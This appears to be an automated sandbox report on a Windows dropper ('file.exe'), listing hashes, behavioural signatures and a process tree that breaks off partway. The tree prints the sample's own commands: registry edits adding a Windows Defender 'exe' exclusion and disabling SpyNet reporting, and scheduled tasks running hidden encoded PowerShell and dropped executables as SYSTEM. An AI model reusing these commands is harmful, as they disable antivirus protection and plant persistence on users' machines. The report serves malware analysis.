Analysis
-
max time kernel
91s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
26/10/2022, 06:01
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
ced410d1a4abecf0a7ac0d06fbe78083
-
SHA1
449e5d7547a1550d116bb5358678b91bef5b8848
-
SHA256
27a9871c69f8b4b91066d6cc7c9347af39c2cb48ed908a619955c777f360f5b2
-
SHA512
f358cc6d7c9cdbb7b9ef496a1dba5e778f4474b46e13465328328a22e6d53792e0245d1a5c068c90a235698467e45b8a1d1265bb12aba688b1c0590e080b8a2e
-
SSDEEP
196608:91OGTAb0UtWMD6R+ALfpSnM+KEa9P5RqE9/p:3OGTAb0UYM7ypS9K1me/p
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 58 4628 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 3880 Install.exe 1060 Install.exe 3220 rPhWYwf.exe 4916 VlxAnxC.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation VlxAnxC.exe -
Loads dropped DLL 1 IoCs
pid Process 4628 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json VlxAnxC.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json VlxAnxC.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini VlxAnxC.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA VlxAnxC.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA VlxAnxC.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini rPhWYwf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 VlxAnxC.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol rPhWYwf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 VlxAnxC.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 VlxAnxC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 VlxAnxC.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi VlxAnxC.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak VlxAnxC.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja VlxAnxC.exe File created C:\Program Files (x86)\CrVpqlWoU\onCUrZ.dll VlxAnxC.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak VlxAnxC.exe File created C:\Program Files (x86)\lVrlTdgfhXOU2\vosnPCOUNrAZk.dll VlxAnxC.exe File created C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\eIqUbwm.dll VlxAnxC.exe File created C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\wtctpnb.xml VlxAnxC.exe File created C:\Program Files (x86)\AJYQrkrAhIRXC\EsUDlok.dll VlxAnxC.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi VlxAnxC.exe File created C:\Program Files (x86)\AJYQrkrAhIRXC\ZrrWxYo.xml VlxAnxC.exe File created C:\Program Files (x86)\lVrlTdgfhXOU2\apXoZry.xml VlxAnxC.exe File created C:\Program Files (x86)\oQtMlHEnfKUn\zAsKVTk.dll VlxAnxC.exe File created C:\Program Files (x86)\CrVpqlWoU\hIKevFL.xml VlxAnxC.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\wLvsIRnBfEcGhlAOV.job schtasks.exe File created C:\Windows\Tasks\gJECdJUNuqvNlNQ.job schtasks.exe File created C:\Windows\Tasks\CDUwqlMPSeBRbvnPZ.job schtasks.exe File created C:\Windows\Tasks\bKFjthDDlmdmBdSpYV.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4628 schtasks.exe 764 schtasks.exe 4264 schtasks.exe 220 schtasks.exe 4472 schtasks.exe 2676 schtasks.exe 4924 schtasks.exe 1928 schtasks.exe 4200 schtasks.exe 4700 schtasks.exe 2840 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ VlxAnxC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" VlxAnxC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" VlxAnxC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" VlxAnxC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing VlxAnxC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000} VlxAnxC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume VlxAnxC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000}\MaxCapacity = "15140" VlxAnxC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" VlxAnxC.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix VlxAnxC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer VlxAnxC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 1520 powershell.EXE 1520 powershell.EXE 1940 powershell.exe 1940 powershell.exe 1412 powershell.exe 1412 powershell.exe 3512 powershell.EXE 3512 powershell.EXE 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe 4916 VlxAnxC.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1520 powershell.EXE Token: SeDebugPrivilege 1940 powershell.exe Token: SeDebugPrivilege 1412 powershell.exe Token: SeDebugPrivilege 3512 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1120 wrote to memory of 3880 1120 file.exe 82 PID 1120 wrote to memory of 3880 1120 file.exe 82 PID 1120 wrote to memory of 3880 1120 file.exe 82 PID 3880 wrote to memory of 1060 3880 Install.exe 83 PID 3880 wrote to memory of 1060 3880 Install.exe 83 PID 3880 wrote to memory of 1060 3880 Install.exe 83 PID 1060 wrote to memory of 2332 1060 Install.exe 84 PID 1060 wrote to memory of 2332 1060 Install.exe 84 PID 1060 wrote to memory of 2332 1060 Install.exe 84 PID 1060 wrote to memory of 3184 1060 Install.exe 86 PID 1060 wrote to memory of 3184 1060 Install.exe 86 PID 1060 wrote to memory of 3184 1060 Install.exe 86 PID 2332 wrote to memory of 4936 2332 forfiles.exe 88 PID 2332 wrote to memory of 4936 2332 forfiles.exe 88 PID 2332 wrote to memory of 4936 2332 forfiles.exe 88 PID 3184 wrote to memory of 4864 3184 forfiles.exe 89 PID 3184 wrote to memory of 4864 3184 forfiles.exe 89 PID 3184 wrote to memory of 4864 3184 forfiles.exe 89 PID 4936 wrote to memory of 1284 4936 cmd.exe 90 PID 4936 wrote to memory of 1284 4936 cmd.exe 90 PID 4936 wrote to memory of 1284 4936 cmd.exe 90 PID 4864 wrote to memory of 2252 4864 cmd.exe 91 PID 4864 wrote to memory of 2252 4864 cmd.exe 91 PID 4864 wrote to memory of 2252 4864 cmd.exe 91 PID 4936 wrote to memory of 1664 4936 cmd.exe 92 PID 4936 wrote to memory of 1664 4936 cmd.exe 92 PID 4936 wrote to memory of 1664 4936 cmd.exe 92 PID 4864 wrote to memory of 4672 4864 cmd.exe 93 PID 4864 wrote to memory of 4672 4864 cmd.exe 93 PID 4864 wrote to memory of 4672 4864 cmd.exe 93 PID 1060 wrote to memory of 4628 1060 Install.exe 94 PID 1060 wrote to memory of 4628 1060 Install.exe 94 PID 1060 wrote to memory of 4628 1060 Install.exe 94 PID 1060 wrote to memory of 1368 1060 Install.exe 96 PID 1060 wrote to memory of 1368 1060 Install.exe 96 PID 1060 wrote to memory of 1368 1060 Install.exe 96 PID 1520 wrote to memory of 4192 1520 powershell.EXE 102 PID 1520 wrote to memory of 4192 1520 powershell.EXE 102 PID 1060 wrote to memory of 1540 1060 Install.exe 112 PID 1060 wrote to memory of 1540 1060 Install.exe 112 PID 1060 wrote to memory of 1540 1060 Install.exe 112 PID 1060 wrote to memory of 1928 1060 Install.exe 114 PID 1060 wrote to memory of 1928 1060 Install.exe 114 PID 1060 wrote to memory of 1928 1060 Install.exe 114 PID 3220 wrote to memory of 1940 3220 rPhWYwf.exe 117 PID 3220 wrote to memory of 1940 3220 rPhWYwf.exe 117 PID 3220 wrote to memory of 1940 3220 rPhWYwf.exe 117 PID 1940 wrote to memory of 4244 1940 powershell.exe 119 PID 1940 wrote to memory of 4244 1940 powershell.exe 119 PID 1940 wrote to memory of 4244 1940 powershell.exe 119 PID 4244 wrote to memory of 4484 4244 cmd.exe 120 PID 4244 wrote to memory of 4484 4244 cmd.exe 120 PID 4244 wrote to memory of 4484 4244 cmd.exe 120 PID 1940 wrote to memory of 4116 1940 powershell.exe 121 PID 1940 wrote to memory of 4116 1940 powershell.exe 121 PID 1940 wrote to memory of 4116 1940 powershell.exe 121 PID 1940 wrote to memory of 3576 1940 powershell.exe 122 PID 1940 wrote to memory of 3576 1940 powershell.exe 122 PID 1940 wrote to memory of 3576 1940 powershell.exe 122 PID 1940 wrote to memory of 3736 1940 powershell.exe 123 PID 1940 wrote to memory of 3736 1940 powershell.exe 123 PID 1940 wrote to memory of 3736 1940 powershell.exe 123 PID 1940 wrote to memory of 1036 1940 powershell.exe 124 PID 1940 wrote to memory of 1036 1940 powershell.exe 124
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Users\Admin\AppData\Local\Temp\7zS9C45.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Users\Admin\AppData\Local\Temp\7zSA2DC.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4936 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1284
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1664
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4864 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2252
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:4672
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gTchxRVxF" /SC once /ST 06:33:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4628
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gTchxRVxF"4⤵PID:1368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTchxRVxF"4⤵PID:1540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKFjthDDlmdmBdSpYV" /SC once /ST 08:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\rPhWYwf.exe\" JF /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1928
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4192
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1588
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2840
-
C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\rPhWYwf.exeC:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\rPhWYwf.exe JF /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3220 -
